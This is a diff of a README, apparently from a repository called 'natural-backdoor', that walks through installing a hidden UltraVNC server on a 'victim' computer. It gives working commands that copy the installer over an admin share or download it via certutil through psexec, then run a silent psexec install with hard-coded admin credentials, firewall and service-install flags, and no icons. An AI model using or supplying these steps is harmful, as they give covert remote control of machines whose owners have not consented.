enseitankado/natural-backdoor/README.md

 ## Step 2: Copy uvncsetup.exe to victim computer

 Copy the unvcsetup.exe file to the victim's computer's system disk.
 You can use path '\\victim\c$\' to browse victim computer.
+If for some reason you cannot view the victim computer, you can also download via the remote shell (psexec) with the following command.

+> certutil.exe -urlcache -split -f "https://www.uvnc.eu/download/1240/UltraVNC_1_2_40_X86_Setup.exe" uvncsetup.exe

 ## Step 3: Start installation

 To start silent installation on victim computer run 'uvncsetup.exe' as remotely using PsExec.exe below:

-> psexec \\victim -u admin -p admin0 -h -i -c C:\uvncsetup.exe /SP- /VERYSILENT /SUPPRESSMSGBOXES /NOCANCEL /NORESTART /CLOSEAPPLICATIONS /FORCECLOSEAPPLICATIONS /LOGCLOSEAPPLICATIONS /RESTARTAPPLICATIONS /NOICONS /FIREWALL /NOVIEW /COMPONENTS="ultravnc_server" /TASKS="installservice,startservice" /DIR="%programfiles%\uvnc"
+> psexec \\victim -u admin -p admin0 -h -i -c C:\uvncsetup.exe /SP- /VERYSILENT /SUPPRESSMSGBOXES /NOCANCEL /NORESTART /CLOSEAPPLICATIONS /FORCECLOSEAPPLICATIONS /LOGCLOSEAPPLICATIONS /RESTARTAPPLICATIONS /NOICONS /FIREWALL /NOVIEW /COMPONENTS="ultravnc_server" /TASKS="installservice" /DIR="%programfiles%\uvnc"

+The inno setup parameters above allow the installation to complete silently.
+The installation files are saved in the %program files%\uvnc directory on victim computer.

 ## Step 4: Define new password